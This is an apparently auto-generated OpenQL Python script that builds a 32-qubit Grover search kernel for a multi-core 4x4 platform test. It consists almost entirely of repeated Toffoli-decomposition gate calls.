ql.set_option('use_default_gates', 'no')
ql.set_option('mapper', mapper)
ql.set_option('write_qasm_files', 'yes')
ql.set_option('write_report_files', 'yes')
platform = ql.Platform('mctests', 'test_multi_core_4x4_full.json')
num_circuits = 1
num_qubits = 32
p = ql.Program('grover_q32_1', platform, num_qubits)
k = ql.Kernel('grover_q32_1', platform, num_qubits)
k.gate('x', (16,))
k.gate('x', (0,))
k.gate('ym90', (0,))
k.gate('x', (1,))
k.gate('ym90', (1,))
k.gate('x', (2,))
k.gate('ym90', (2,))
k.gate('x', (3,))
k.gate('ym90', (3,))
k.gate('x', (4,))
k.gate('ym90', (4,))
k.gate('x', (5,))
k.gate('ym90', (5,))
k.gate('x', (6,))
k.gate('ym90', (6,))
k.gate('x', (7,))
k.gate('ym90', (7,))
k.gate('x', (8,))
k.gate('ym90', (8,))
k.gate('x', (9,))
k.gate('ym90', (9,))
k.gate('x', (10,))
k.gate('ym90', (10,))
k.gate('x', (11,))
k.gate('ym90', (11,))
k.gate('x', (12,))
k.gate('ym90', (12,))
k.gate('x', (13,))
k.gate('ym90', (13,))
k.gate('x', (14,))
k.gate('ym90', (14,))
k.gate('x', (15,))
k.gate('ym90', (15,))
k.gate('x', (16,))
k.gate('ym90', (16,))
k.gate('x', (0,))
k.gate('x', (1,))
k.gate('x', (2,))
k.gate('x', (3,))
k.gate('x', (4,))
k.gate('x', (5,))
k.gate('x', (6,))
k.gate('x', (7,))
k.gate('x', (8,))
k.gate('x', (9,))
k.gate('x', (10,))
k.gate('x', (11,))
k.gate('x', (12,))
k.gate('x', (13,))
k.gate('x', (14,))
k.gate('x', (15,))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (1,))
k.gate('t', (17,))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (0, 1))
k.gate('tdag', (1,))
k.gate('t', (0,))
k.gate('cnot', (0, 1))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (17,))
k.gate('t', (18,))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (2, 17))
k.gate('tdag', (17,))
k.gate('t', (2,))
k.gate('cnot', (2, 17))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (18,))
k.gate('t', (19,))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (3, 18))
k.gate('tdag', (18,))
k.gate('t', (3,))
k.gate('cnot', (3, 18))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (19,))
k.gate('t', (20,))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (4, 19))
k.gate('tdag', (19,))
k.gate('t', (4,))
k.gate('cnot', (4, 19))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (20,))
k.gate('t', (21,))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (5, 20))
k.gate('tdag', (20,))
k.gate('t', (5,))
k.gate('cnot', (5, 20))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (21,))
k.gate('t', (22,))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (6, 21))
k.gate('tdag', (21,))
k.gate('t', (6,))
k.gate('cnot', (6, 21))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (22,))
k.gate('t', (23,))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (7, 22))
k.gate('tdag', (22,))
k.gate('t', (7,))
k.gate('cnot', (7, 22))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (23,))
k.gate('t', (24,))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (8, 23))
k.gate('tdag', (23,))
k.gate('t', (8,))
k.gate('cnot', (8, 23))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (24,))
k.gate('t', (25,))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (9, 24))
k.gate('tdag', (24,))
k.gate('t', (9,))
k.gate('cnot', (9, 24))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (25,))
k.gate('t', (26,))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (10, 25))
k.gate('tdag', (25,))
k.gate('t', (10,))
k.gate('cnot', (10, 25))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (26,))
k.gate('t', (27,))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (11, 26))
k.gate('tdag', (26,))
k.gate('t', (11,))
k.gate('cnot', (11, 26))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (27,))
k.gate('t', (28,))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (12, 27))
k.gate('tdag', (27,))
k.gate('t', (12,))
k.gate('cnot', (12, 27))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (28,))
k.gate('t', (29,))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (13, 28))
k.gate('tdag', (28,))
k.gate('t', (13,))
k.gate('cnot', (13, 28))
k.gate('x', (30,))
k.gate('ym90', (30,))
k.gate('cnot', (29, 30))
k.gate('tdag', (30,))
k.gate('cnot', (14, 30))
k.gate('t', (30,))
k.gate('cnot', (29, 30))
k.gate('tdag', (30,))
k.gate('cnot', (14, 30))
k.gate('t', (29,))
k.gate('t', (30,))
k.gate('x', (30,))
k.gate('ym90', (30,))
k.gate('cnot', (14, 29))
k.gate('tdag', (29,))
k.gate('t', (14,))
k.gate('cnot', (14, 29))
k.gate('x', (16,))
k.gate('ym90', (16,))
k.gate('cnot', (15, 16))
k.gate('tdag', (16,))
k.gate('cnot', (30, 16))
k.gate('t', (16,))
k.gate('cnot', (15, 16))
k.gate('tdag', (16,))
k.gate('cnot', (30, 16))
k.gate('t', (15,))
k.gate('t', (16,))
k.gate('x', (16,))
k.gate('ym90', (16,))
k.gate('cnot', (30, 15))
k.gate('tdag', (15,))
k.gate('t', (30,))
k.gate('cnot', (30, 15))
k.gate('x', (30,))
k.gate('ym90', (30,))
k.gate('cnot', (29, 30))
k.gate('tdag', (30,))
k.gate('cnot', (14, 30))
k.gate('t', (30,))
k.gate('cnot', (29, 30))
k.gate('tdag', (30,))
k.gate('cnot', (14, 30))
k.gate('t', (29,))
k.gate('t', (30,))
k.gate('x', (30,))
k.gate('ym90', (30,))
k.gate('cnot', (14, 29))
k.gate('tdag', (29,))
k.gate('t', (14,))
k.gate('cnot', (14, 29))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (28,))
k.gate('t', (29,))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (13, 28))
k.gate('tdag', (28,))
k.gate('t', (13,))
k.gate('cnot', (13, 28))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (27,))
k.gate('t', (28,))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (12, 27))
k.gate('tdag', (27,))
k.gate('t', (12,))
k.gate('cnot', (12, 27))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (26,))
k.gate('t', (27,))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (11, 26))
k.gate('tdag', (26,))
k.gate('t', (11,))
k.gate('cnot', (11, 26))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (25,))
k.gate('t', (26,))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (10, 25))
k.gate('tdag', (25,))
k.gate('t', (10,))
k.gate('cnot', (10, 25))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (24,))
k.gate('t', (25,))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (9, 24))
k.gate('tdag', (24,))
k.gate('t', (9,))
k.gate('cnot', (9, 24))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (23,))
k.gate('t', (24,))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (8, 23))
k.gate('tdag', (23,))
k.gate('t', (8,))
k.gate('cnot', (8, 23))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (22,))
k.gate('t', (23,))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (7, 22))
k.gate('tdag', (22,))
k.gate('t', (7,))
k.gate('cnot', (7, 22))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (21,))
k.gate('t', (22,))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (6, 21))
k.gate('tdag', (21,))
k.gate('t', (6,))
k.gate('cnot', (6, 21))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (20,))
k.gate('t', (21,))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (5, 20))
k.gate('tdag', (20,))
k.gate('t', (5,))
k.gate('cnot', (5, 20))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (19,))
k.gate('t', (20,))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (4, 19))
k.gate('tdag', (19,))
k.gate('t', (4,))
k.gate('cnot', (4, 19))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (18,))
k.gate('t', (19,))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (3, 18))
k.gate('tdag', (18,))
k.gate('t', (3,))
k.gate('cnot', (3, 18))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (17,))
k.gate('t', (18,))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (2, 17))
k.gate('tdag', (17,))
k.gate('t', (2,))
k.gate('cnot', (2, 17))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (1,))
k.gate('t', (17,))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (0, 1))
k.gate('tdag', (1,))
k.gate('t', (0,))
k.gate('cnot', (0, 1))
k.gate('x', (0,))
k.gate('x', (1,))
k.gate('x', (2,))
k.gate('x', (3,))
k.gate('x', (4,))
k.gate('x', (5,))
k.gate('x', (6,))
k.gate('x', (7,))
k.gate('x', (8,))
k.gate('x', (9,))
k.gate('x', (10,))
k.gate('x', (11,))
k.gate('x', (12,))
k.gate('x', (13,))
k.gate('x', (14,))
k.gate('x', (15,))
k.gate('x', (0,))
k.gate('ym90', (0,))
k.gate('x', (1,))
k.gate('ym90', (1,))
k.gate('x', (2,))
k.gate('ym90', (2,))
k.gate('x', (3,))
k.gate('ym90', (3,))
k.gate('x', (4,))
k.gate('ym90', (4,))
k.gate('x', (5,))
k.gate('ym90', (5,))
k.gate('x', (6,))
k.gate('ym90', (6,))
k.gate('x', (7,))
k.gate('ym90', (7,))
k.gate('x', (8,))
k.gate('ym90', (8,))
k.gate('x', (9,))
k.gate('ym90', (9,))
k.gate('x', (10,))
k.gate('ym90', (10,))
k.gate('x', (11,))
k.gate('ym90', (11,))
k.gate('x', (12,))
k.gate('ym90', (12,))
k.gate('x', (13,))
k.gate('ym90', (13,))
k.gate('x', (14,))
k.gate('ym90', (14,))
k.gate('x', (15,))
k.gate('ym90', (15,))
k.gate('x', (0,))
k.gate('x', (1,))
k.gate('x', (2,))
k.gate('x', (3,))
k.gate('x', (4,))
k.gate('x', (5,))
k.gate('x', (6,))
k.gate('x', (7,))
k.gate('x', (8,))
k.gate('x', (9,))
k.gate('x', (10,))
k.gate('x', (11,))
k.gate('x', (12,))
k.gate('x', (13,))
k.gate('x', (14,))
k.gate('x', (15,))
k.gate('x', (15,))
k.gate('ym90', (15,))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (1,))
k.gate('t', (17,))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (0, 1))
k.gate('tdag', (1,))
k.gate('t', (0,))
k.gate('cnot', (0, 1))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (17,))
k.gate('t', (18,))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (2, 17))
k.gate('tdag', (17,))
k.gate('t', (2,))
k.gate('cnot', (2, 17))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (18,))
k.gate('t', (19,))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (3, 18))
k.gate('tdag', (18,))
k.gate('t', (3,))
k.gate('cnot', (3, 18))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (19,))
k.gate('t', (20,))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (4, 19))
k.gate('tdag', (19,))
k.gate('t', (4,))
k.gate('cnot', (4, 19))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (20,))
k.gate('t', (21,))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (5, 20))
k.gate('tdag', (20,))
k.gate('t', (5,))
k.gate('cnot', (5, 20))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (21,))
k.gate('t', (22,))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (6, 21))
k.gate('tdag', (21,))
k.gate('t', (6,))
k.gate('cnot', (6, 21))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (22,))
k.gate('t', (23,))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (7, 22))
k.gate('tdag', (22,))
k.gate('t', (7,))
k.gate('cnot', (7, 22))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (23,))
k.gate('t', (24,))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (8, 23))
k.gate('tdag', (23,))
k.gate('t', (8,))
k.gate('cnot', (8, 23))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (24,))
k.gate('t', (25,))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (9, 24))
k.gate('tdag', (24,))
k.gate('t', (9,))
k.gate('cnot', (9, 24))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (25,))
k.gate('t', (26,))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (10, 25))
k.gate('tdag', (25,))
k.gate('t', (10,))
k.gate('cnot', (10, 25))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (26,))
k.gate('t', (27,))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (11, 26))
k.gate('tdag', (26,))
k.gate('t', (11,))
k.gate('cnot', (11, 26))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (27,))
k.gate('t', (28,))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (12, 27))
k.gate('tdag', (27,))
k.gate('t', (12,))
k.gate('cnot', (12, 27))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (28,))
k.gate('t', (29,))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (13, 28))
k.gate('tdag', (28,))
k.gate('t', (13,))
k.gate('cnot', (13, 28))
k.gate('x', (15,))
k.gate('ym90', (15,))
k.gate('cnot', (14, 15))
k.gate('tdag', (15,))
k.gate('cnot', (29, 15))
k.gate('t', (15,))
k.gate('cnot', (14, 15))
k.gate('tdag', (15,))
k.gate('cnot', (29, 15))
k.gate('t', (14,))
k.gate('t', (15,))
k.gate('x', (15,))
k.gate('ym90', (15,))
k.gate('cnot', (29, 14))
k.gate('tdag', (14,))
k.gate('t', (29,))
k.gate('cnot', (29, 14))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (29,))
k.gate('cnot', (28, 29))
k.gate('tdag', (29,))
k.gate('cnot', (13, 29))
k.gate('t', (28,))
k.gate('t', (29,))
k.gate('x', (29,))
k.gate('ym90', (29,))
k.gate('cnot', (13, 28))
k.gate('tdag', (28,))
k.gate('t', (13,))
k.gate('cnot', (13, 28))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (28,))
k.gate('cnot', (27, 28))
k.gate('tdag', (28,))
k.gate('cnot', (12, 28))
k.gate('t', (27,))
k.gate('t', (28,))
k.gate('x', (28,))
k.gate('ym90', (28,))
k.gate('cnot', (12, 27))
k.gate('tdag', (27,))
k.gate('t', (12,))
k.gate('cnot', (12, 27))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (27,))
k.gate('cnot', (26, 27))
k.gate('tdag', (27,))
k.gate('cnot', (11, 27))
k.gate('t', (26,))
k.gate('t', (27,))
k.gate('x', (27,))
k.gate('ym90', (27,))
k.gate('cnot', (11, 26))
k.gate('tdag', (26,))
k.gate('t', (11,))
k.gate('cnot', (11, 26))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (26,))
k.gate('cnot', (25, 26))
k.gate('tdag', (26,))
k.gate('cnot', (10, 26))
k.gate('t', (25,))
k.gate('t', (26,))
k.gate('x', (26,))
k.gate('ym90', (26,))
k.gate('cnot', (10, 25))
k.gate('tdag', (25,))
k.gate('t', (10,))
k.gate('cnot', (10, 25))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (25,))
k.gate('cnot', (24, 25))
k.gate('tdag', (25,))
k.gate('cnot', (9, 25))
k.gate('t', (24,))
k.gate('t', (25,))
k.gate('x', (25,))
k.gate('ym90', (25,))
k.gate('cnot', (9, 24))
k.gate('tdag', (24,))
k.gate('t', (9,))
k.gate('cnot', (9, 24))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (24,))
k.gate('cnot', (23, 24))
k.gate('tdag', (24,))
k.gate('cnot', (8, 24))
k.gate('t', (23,))
k.gate('t', (24,))
k.gate('x', (24,))
k.gate('ym90', (24,))
k.gate('cnot', (8, 23))
k.gate('tdag', (23,))
k.gate('t', (8,))
k.gate('cnot', (8, 23))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (23,))
k.gate('cnot', (22, 23))
k.gate('tdag', (23,))
k.gate('cnot', (7, 23))
k.gate('t', (22,))
k.gate('t', (23,))
k.gate('x', (23,))
k.gate('ym90', (23,))
k.gate('cnot', (7, 22))
k.gate('tdag', (22,))
k.gate('t', (7,))
k.gate('cnot', (7, 22))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (22,))
k.gate('cnot', (21, 22))
k.gate('tdag', (22,))
k.gate('cnot', (6, 22))
k.gate('t', (21,))
k.gate('t', (22,))
k.gate('x', (22,))
k.gate('ym90', (22,))
k.gate('cnot', (6, 21))
k.gate('tdag', (21,))
k.gate('t', (6,))
k.gate('cnot', (6, 21))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (21,))
k.gate('cnot', (20, 21))
k.gate('tdag', (21,))
k.gate('cnot', (5, 21))
k.gate('t', (20,))
k.gate('t', (21,))
k.gate('x', (21,))
k.gate('ym90', (21,))
k.gate('cnot', (5, 20))
k.gate('tdag', (20,))
k.gate('t', (5,))
k.gate('cnot', (5, 20))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (20,))
k.gate('cnot', (19, 20))
k.gate('tdag', (20,))
k.gate('cnot', (4, 20))
k.gate('t', (19,))
k.gate('t', (20,))
k.gate('x', (20,))
k.gate('ym90', (20,))
k.gate('cnot', (4, 19))
k.gate('tdag', (19,))
k.gate('t', (4,))
k.gate('cnot', (4, 19))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (19,))
k.gate('cnot', (18, 19))
k.gate('tdag', (19,))
k.gate('cnot', (3, 19))
k.gate('t', (18,))
k.gate('t', (19,))
k.gate('x', (19,))
k.gate('ym90', (19,))
k.gate('cnot', (3, 18))
k.gate('tdag', (18,))
k.gate('t', (3,))
k.gate('cnot', (3, 18))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (18,))
k.gate('cnot', (17, 18))
k.gate('tdag', (18,))
k.gate('cnot', (2, 18))
k.gate('t', (17,))
k.gate('t', (18,))
k.gate('x', (18,))
k.gate('ym90', (18,))
k.gate('cnot', (2, 17))
k.gate('tdag', (17,))
k.gate('t', (2,))
k.gate('cnot', (2, 17))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (17,))
k.gate('cnot', (1, 17))
k.gate('tdag', (17,))
k.gate('cnot', (0, 17))
k.gate('t', (1,))
k.gate('t', (17,))
k.gate('x', (17,))
k.gate('ym90', (17,))
k.gate('cnot', (0, 1))
k.gate('tdag', (1,))
k.gate('t', (0,))
k.gate('cnot', (0, 1))
k.gate('x', (15,))
